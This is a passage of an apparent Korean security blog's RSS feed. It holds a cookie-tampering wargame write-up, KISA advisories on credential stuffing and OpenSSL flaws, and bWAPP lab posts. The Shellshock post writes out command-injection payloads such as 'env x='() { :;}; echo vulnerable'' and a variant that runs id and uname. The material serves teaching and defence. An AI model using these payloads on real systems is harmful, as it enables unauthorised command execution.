&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1091&quot; data-origin-height=&quot;487&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bvJc7C/btrT4FgwClc/PCO2qgSTcwscfpim9Sdqfk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bvJc7C/btrT4FgwClc/PCO2qgSTcwscfpim9Sdqfk/img.png&quot; data-alt=&quot;EditThisCookie 값 입력&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bvJc7C/btrT4FgwClc/PCO2qgSTcwscfpim9Sdqfk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbvJc7C%2FbtrT4FgwClc%2FPCO2qgSTcwscfpim9Sdqfk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;335&quot; data-origin-width=&quot;1091&quot; data-origin-height=&quot;487&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;EditThisCookie 값 입력&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;span style=&quot;&quot;&gt;&lt;span style=&quot;font-size: 13.3333px;&quot;&gt;user_lv 값이 3이상이고 4보다 작은 값을 입력 후 초록색 체크 버튼을 누른 후 새로고침을 해 주었습니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;867&quot; data-origin-height=&quot;172&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Pi383/btrTVTOcLIB/pfwdiN7ankvb8RhHQwDzWK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Pi383/btrTVTOcLIB/pfwdiN7ankvb8RhHQwDzWK/img.png&quot; data-alt=&quot;old-01&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Pi383/btrTVTOcLIB/pfwdiN7ankvb8RhHQwDzWK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FPi383%2FbtrTVTOcLIB%2FpfwdiN7ankvb8RhHQwDzWK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;149&quot; data-origin-width=&quot;867&quot; data-origin-height=&quot;172&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;old-01&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::War Game/webhacking.kr</category>
      <category>EditThisCookie</category>
      <category>old-01</category>
      <category>wargame</category>
      <category>webhacking</category>
      <category>문제</category>
      <category>워게임</category>
      <category>웹해킹</category>
      <category>웹해킹.kr</category>
      <category>쿠키변조</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/88</guid>
      <comments>https://securitycode.tistory.com/88#entry88comment</comments>
      <pubDate>Mon, 19 Dec 2022 15:46:46 +0900</pubDate>
    </item>
    <item>
      <title>보안공지 : 기존 유출된 계정정보를 이용한 해킹 위협 증가에 따른 사용자 계정 보안 강화 권고</title>
      <link>https://securitycode.tistory.com/259</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;□&amp;nbsp;개요&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;&amp;nbsp;o&amp;nbsp;최근&amp;nbsp;해커가&amp;nbsp;보안이&amp;nbsp;허술한&amp;nbsp;사이트&amp;nbsp;등을&amp;nbsp;통해&amp;nbsp;획득한&amp;nbsp;사용자&amp;nbsp;계정정보(ID,&amp;nbsp;비밀번호)를&amp;nbsp;이용해&amp;nbsp;타&amp;nbsp;사이트에&amp;nbsp;무단&amp;nbsp;로그인하는&amp;nbsp;침해사고가&amp;nbsp;발생하고&amp;nbsp;있어,&amp;nbsp;사용자들의&amp;nbsp;계정정보&amp;nbsp;점검&amp;nbsp;및&amp;nbsp;대비&amp;nbsp;필요 &lt;br /&gt;&lt;br /&gt;&lt;b&gt;□&amp;nbsp;사고유형&amp;nbsp;및&amp;nbsp;사례&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;&amp;nbsp;o&amp;nbsp;해커가&amp;nbsp;타&amp;nbsp;사이트에서&amp;nbsp;취득한&amp;nbsp;계정정보를&amp;nbsp;사용하여&amp;nbsp;특정&amp;nbsp;사이트에&amp;nbsp;무작위로&amp;nbsp;로그인을&amp;nbsp;시도하고,&amp;nbsp;로그인에&amp;nbsp;성공한&amp;nbsp;사용자의&amp;nbsp;가입&amp;nbsp;정보를&amp;nbsp;무단&amp;nbsp;변경 &lt;br /&gt;&lt;br /&gt;&lt;b&gt;□&amp;nbsp;보안권고사항&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;&amp;nbsp;o&amp;nbsp;여러&amp;nbsp;사이트의&amp;nbsp;계정&amp;nbsp;정보를&amp;nbsp;중복되지&amp;nbsp;않도록&amp;nbsp;설정 &lt;br /&gt;&amp;nbsp;o 비밀번호는 3가지(영문, 숫자, 특수기호) 문자를 조합하여 8자리 이상으로 설정하고 3개월 단위로 주기적으로 변경 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;ID,&amp;nbsp;비밀번호&amp;nbsp;이외에&amp;nbsp;OTP,&amp;nbsp;SMS&amp;nbsp;등을&amp;nbsp;통한&amp;nbsp;이중&amp;nbsp;인증&amp;nbsp;기능&amp;nbsp;설정 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;계정정보가&amp;nbsp;노출된&amp;nbsp;경우&amp;nbsp;반드시&amp;nbsp;동일한&amp;nbsp;계정정보를&amp;nbsp;사용하는&amp;nbsp;모든&amp;nbsp;사이트의&amp;nbsp;비밀번호&amp;nbsp;변경&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;출처&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=67079&quot;&gt;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=67079&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>KISA</category>
      <category>계정 보안 강화</category>
      <category>계정정보</category>
      <category>보안공지</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/259</guid>
      <comments>https://securitycode.tistory.com/259#entry259comment</comments>
      <pubDate>Mon, 19 Dec 2022 13:21:03 +0900</pubDate>
    </item>
    <item>
      <title>비박스(bWAPP) A9 Shellshock Vulnerability (CGI)</title>
      <link>https://securitycode.tistory.com/258</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;이&amp;nbsp;도구를&amp;nbsp;이용하여&amp;nbsp;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;A9&amp;nbsp;-&amp;nbsp;Shellshock&amp;nbsp;Vulnerability&amp;nbsp;(CGI)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Shellshock(셸 쇼크)는 광범위하게 사용되는 유닉스 Bash에서 발생하는 보안 버그입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Shell(셸)은 운영체제상에서 사용자가 입력하는 명령을 읽고 해석하여 대신 실행해주는 프로그램입니다. 즉 다시 말해서, 운영체제의 커널과 사용자 사이를 이어주는 역할을 하며 사용자의 명령어를 해석하고 운영체제가 알아들을 수 있도록 도와주는 명령어 해석기입니다. Linux에서 사용하는 Shell의 종류로는 다음과 같은 것들이 있습니다.&lt;br /&gt;&lt;br /&gt;bash&amp;nbsp;:&amp;nbsp;Bourne-Again&amp;nbsp;Shell(프롬프트&amp;nbsp;:&amp;nbsp;#,&amp;nbsp;경로&amp;nbsp;:&amp;nbsp;/bin/bash).&amp;nbsp;가장&amp;nbsp;대표적으로&amp;nbsp;사용. &lt;br /&gt;sh&amp;nbsp;:&amp;nbsp;Bourne&amp;nbsp;Shell(프롬프트&amp;nbsp;:&amp;nbsp;$,&amp;nbsp;경로&amp;nbsp;:&amp;nbsp;/bin/sh) &lt;br /&gt;csh&amp;nbsp;:&amp;nbsp;C&amp;nbsp;Shell(프롬프트&amp;nbsp;:&amp;nbsp;%,&amp;nbsp;경로&amp;nbsp;:&amp;nbsp;/bin/csh) &lt;br /&gt;ksh&amp;nbsp;:&amp;nbsp;Kron&amp;nbsp;Shell(프롬프트&amp;nbsp;:&amp;nbsp;$,&amp;nbsp;경로&amp;nbsp;:&amp;nbsp;/bin/ksh) &lt;br /&gt;tcsh&amp;nbsp;:&amp;nbsp;TENEX&amp;nbsp;C&amp;nbsp;Shell(프롬프트&amp;nbsp;:&amp;nbsp;&amp;gt;,&amp;nbsp;경로&amp;nbsp;:&amp;nbsp;/bin/tcsh)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pwn은 pwnable 약자로 시스템 해킹을 뜻 합니다. pwnable 명칭의&amp;nbsp;유래는&amp;nbsp;한&amp;nbsp;유저가&amp;nbsp;게임에서&amp;nbsp;승리했는데,&amp;nbsp;이때&amp;nbsp;own!이라고&amp;nbsp;입력할&amp;nbsp;것을&amp;nbsp;pwn!라고&amp;nbsp;입력했고 이 말이 유행을 타서 굳어졌다는 말이 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;664&quot; data-origin-height=&quot;253&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dI8hp6/btrQYo2TeSq/ewnL5B3USDuQfBBOYtXVS1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dI8hp6/btrQYo2TeSq/ewnL5B3USDuQfBBOYtXVS1/img.png&quot; data-alt=&quot;shellshock.php&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dI8hp6/btrQYo2TeSq/ewnL5B3USDuQfBBOYtXVS1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdI8hp6%2FbtrQYo2TeSq%2FewnL5B3USDuQfBBOYtXVS1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;248&quot; data-origin-width=&quot;664&quot; data-origin-height=&quot;253&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;shellshock.php&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;shellshock.php 페이지의 화면입니다. 현재 저는 윈도우 환경으로 요청 URL을 찾을 수 없다고 나오는 것입니다. 추후 유닉스 환경에서 비박스 환경 구축부터 알아보고, 여기서는 해당 취약점이 어떻게 발생하는지 알아보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1078&quot; data-origin-height=&quot;492&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cYUcSm/btrQYsD8SyS/2MXdakeOvwBMBowmojQNkK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cYUcSm/btrQYsD8SyS/2MXdakeOvwBMBowmojQNkK/img.png&quot; data-alt=&quot;https://www.cvedetails.com/cve/CVE-2014-6271/?q=CVE-2014-6271&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cYUcSm/btrQYsD8SyS/2MXdakeOvwBMBowmojQNkK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcYUcSm%2FbtrQYsD8SyS%2F2MXdakeOvwBMBowmojQNkK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;342&quot; data-origin-width=&quot;1078&quot; data-origin-height=&quot;492&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://www.cvedetails.com/cve/CVE-2014-6271/?q=CVE-2014-6271&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;CVE 사이트를 확인해 보면 ShellShock 취약점은 CVE-2014-6271로 명명되어 있으며 CVE 점수는 10점 만점인 것을 알 수 있습니다. 내용을 살펴보면 4.3을 통한 GNU Bash는 OpenSSH sshd의 ForceCommand 기능, Apache의 mod_cgi 및 mod_cgid 모듈과 관련된 벡터에 의해 입증된 바와 같이 환경 변수 값에서 함수 정의 후 후행 문자열을 처리하여 원격 공격자가 제작된 환경을 통해 임의의 코드를 실행할 수 있도록 합니다.라고 확인할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 취약점은 Bash 셸 환경 변수 등록 시 함수 형태로 등록이 가능하여 취약 버전 셸에서 환경 변수 등록 시 함수 선언 끝에 조작된 값을 이어서 삽입하면 원하는 명령을 수행할 수 있는 취약점입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Bash 환경 변수 선언&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;export&amp;nbsp;shelltest='ShellshockTEST'&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;환경 변수로 선언된 shelltest에 대하여 값 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;printenv shelltest&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Bash의 함수 선언 및 함수 등록&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;shelltest() { echo ShellshockTest; }&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;export shelltest&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;환경변수의 값을 함수와 비슷한 형태로 재정의&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;export shelltest=' () { echo ShellshockTest; } '&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;공격 구문&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span&gt;export shelltest='&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;() { echo ShellshockTest; };id;uname; '&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;$&amp;nbsp;env&amp;nbsp;x='()&amp;nbsp;{&amp;nbsp;:;};&amp;nbsp;echo&amp;nbsp;vulnerable'&amp;nbsp;bash&amp;nbsp;-c&amp;nbsp;&quot;echo&amp;nbsp;this&amp;nbsp;is&amp;nbsp;a&amp;nbsp;test&quot; &lt;br /&gt;&amp;nbsp;vulnerable &lt;br /&gt;&amp;nbsp;this&amp;nbsp;is&amp;nbsp;a&amp;nbsp;test &lt;br /&gt;&lt;br /&gt;&amp;nbsp;$&amp;nbsp;env&amp;nbsp;x='()&amp;nbsp;{&amp;nbsp;:;};&amp;nbsp;echo&amp;nbsp;vulnerable'&amp;nbsp;bash&amp;nbsp;-c&amp;nbsp;&quot;echo&amp;nbsp;this&amp;nbsp;is&amp;nbsp;a&amp;nbsp;test&quot; &lt;br /&gt;&amp;nbsp;bash:&amp;nbsp;warning:&amp;nbsp;x:&amp;nbsp;ignoring&amp;nbsp;function&amp;nbsp;definition&amp;nbsp;attempt &lt;br /&gt;&amp;nbsp;bash:&amp;nbsp;error&amp;nbsp;importing&amp;nbsp;function&amp;nbsp;definition&amp;nbsp;for&amp;nbsp;`x' &lt;br /&gt;&amp;nbsp;this&amp;nbsp;is&amp;nbsp;a&amp;nbsp;test&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=22166&amp;amp;queryString=cGFnZT0xJnNvcnRfY29kZT0mc29ydF9jb2RlX25hbWU9JnNlYXJjaF9zb3J0PXRpdGxlX25hbWUmc2VhcmNoX3dvcmQ9Z251K2Jhc2g=&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;KISA GNU&amp;nbsp;Bash&amp;nbsp;원격코드실행&amp;nbsp;취약점&amp;nbsp;이슈&amp;nbsp;분석&amp;nbsp;및&amp;nbsp;대응방안&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://www.exploit-db.com/exploits/34765&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.exploit-db.com/exploits/34765&lt;/a&gt;&lt;/p&gt;</description>
      <category>Code::Security/비박스(BWAPP)</category>
      <category>bWAPP</category>
      <category>CVE-2014-6271</category>
      <category>shellshock</category>
      <category>Shellshock Vulnerability (CGI)</category>
      <category>비박스</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/258</guid>
      <comments>https://securitycode.tistory.com/258#entry258comment</comments>
      <pubDate>Fri, 11 Nov 2022 13:57:08 +0900</pubDate>
    </item>
    <item>
      <title>비박스(bWAPP) A9 phpMyAdmin BBCode Tag XSS</title>
      <link>https://securitycode.tistory.com/257</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;이&amp;nbsp;도구를&amp;nbsp;이용하여&amp;nbsp;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&amp;nbsp;&lt;/span&gt;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt; &lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;A9&amp;nbsp;-&amp;nbsp;phpMyAdmin&amp;nbsp;BBCode&amp;nbsp;Tag&amp;nbsp;XSS&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 취약점을 앞에서 다뤘던 내용으로 아래의 페이지를 참조해 주시기 바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://securitycode.tistory.com/182&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://securitycode.tistory.com/182&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1668128021784&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;phpMyAdmin - Client-Side Code Injection (CVE-2010-4480)&quot; data-og-description=&quot;허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다. CVE-ID CVE-2010-&quot; data-og-host=&quot;securitycode.tistory.com&quot; data-og-source-url=&quot;https://securitycode.tistory.com/182&quot; data-og-url=&quot;https://securitycode.tistory.com/182&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/WkR4x/hyQxQLi8fN/sbQp2xZKOcvQ1mJhMBGt5k/img.png?width=800&amp;amp;height=95&amp;amp;face=0_0_800_95,https://scrap.kakaocdn.net/dn/ogWYz/hyQwBCdiOG/PewjkwKtKAMSh5E5JBp7Y0/img.png?width=800&amp;amp;height=95&amp;amp;face=0_0_800_95,https://scrap.kakaocdn.net/dn/zgvAQ/hyQwCunfhR/pK5VAMupTxQYn3uQzREh4K/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400&quot;&gt;&lt;a href=&quot;https://securitycode.tistory.com/182&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://securitycode.tistory.com/182&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/WkR4x/hyQxQLi8fN/sbQp2xZKOcvQ1mJhMBGt5k/img.png?width=800&amp;amp;height=95&amp;amp;face=0_0_800_95,https://scrap.kakaocdn.net/dn/ogWYz/hyQwBCdiOG/PewjkwKtKAMSh5E5JBp7Y0/img.png?width=800&amp;amp;height=95&amp;amp;face=0_0_800_95,https://scrap.kakaocdn.net/dn/zgvAQ/hyQwCunfhR/pK5VAMupTxQYn3uQzREh4K/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;phpMyAdmin - Client-Side Code Injection (CVE-2010-4480)&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;허용받지 않은 서비스 대상으로 해킹을 시도하는 행위는 범죄 행위입니다. 해킹을 시도할 때에 발생하는 법적인 책임은 그것을 행한 사용자에게 있다는 것을 명심하시기 바랍니다. CVE-ID CVE-2010-&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;securitycode.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::Security/비박스(BWAPP)</category>
      <category>bWAPP</category>
      <category>CVE-2010-4480</category>
      <category>phpMyAdmin BBCode Tag XSS</category>
      <category>비박스</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/257</guid>
      <comments>https://securitycode.tistory.com/257#entry257comment</comments>
      <pubDate>Fri, 11 Nov 2022 09:54:50 +0900</pubDate>
    </item>
    <item>
      <title>업데이트 : OpenSSL 취약점 보안 업데이트 권고 (2022.11.02)</title>
      <link>https://securitycode.tistory.com/255</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;□&amp;nbsp;개요 &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;o&amp;nbsp;OpenSSL&amp;nbsp;프로젝트는&amp;nbsp;OpenSSL에서&amp;nbsp;발생하는&amp;nbsp;취약점을&amp;nbsp;해결한&amp;nbsp;보안&amp;nbsp;업데이트&amp;nbsp;발표 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;o&amp;nbsp;공격자는&amp;nbsp;해당&amp;nbsp;취약점을&amp;nbsp;악용하여&amp;nbsp;피해를&amp;nbsp;발생시킬&amp;nbsp;수&amp;nbsp;있으므로,&amp;nbsp;해당&amp;nbsp;제품을&amp;nbsp;사용하는&amp;nbsp;이용자들은&amp;nbsp;최신&amp;nbsp;버전으로&amp;nbsp;업데이트&amp;nbsp;권고 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp; &lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;□&amp;nbsp;설명&amp;nbsp;[1] &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;o&amp;nbsp;OpenSSL에서&amp;nbsp;버퍼오버플로우로&amp;nbsp;인해&amp;nbsp;발생하는&amp;nbsp;원격&amp;nbsp;코드&amp;nbsp;실행&amp;nbsp;취약점&amp;nbsp;(CVE-2022-3602) &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&amp;nbsp;o&amp;nbsp;OpenSSL에서&amp;nbsp;버퍼오버플로우로&amp;nbsp;인해&amp;nbsp;발생하는&amp;nbsp;서비스&amp;nbsp;거부&amp;nbsp;취약점&amp;nbsp;(CVE-2022-3786)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;802&quot; data-origin-height=&quot;148&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/QRbID/btrP8ZEkmwz/pLeQU25Im6F3Ttr8KZcank/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/QRbID/btrP8ZEkmwz/pLeQU25Im6F3Ttr8KZcank/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/QRbID/btrP8ZEkmwz/pLeQU25Im6F3Ttr8KZcank/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FQRbID%2FbtrP8ZEkmwz%2FpLeQU25Im6F3Ttr8KZcank%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;802&quot; height=&quot;148&quot; data-origin-width=&quot;802&quot; data-origin-height=&quot;148&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;□ 설명 [2]&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
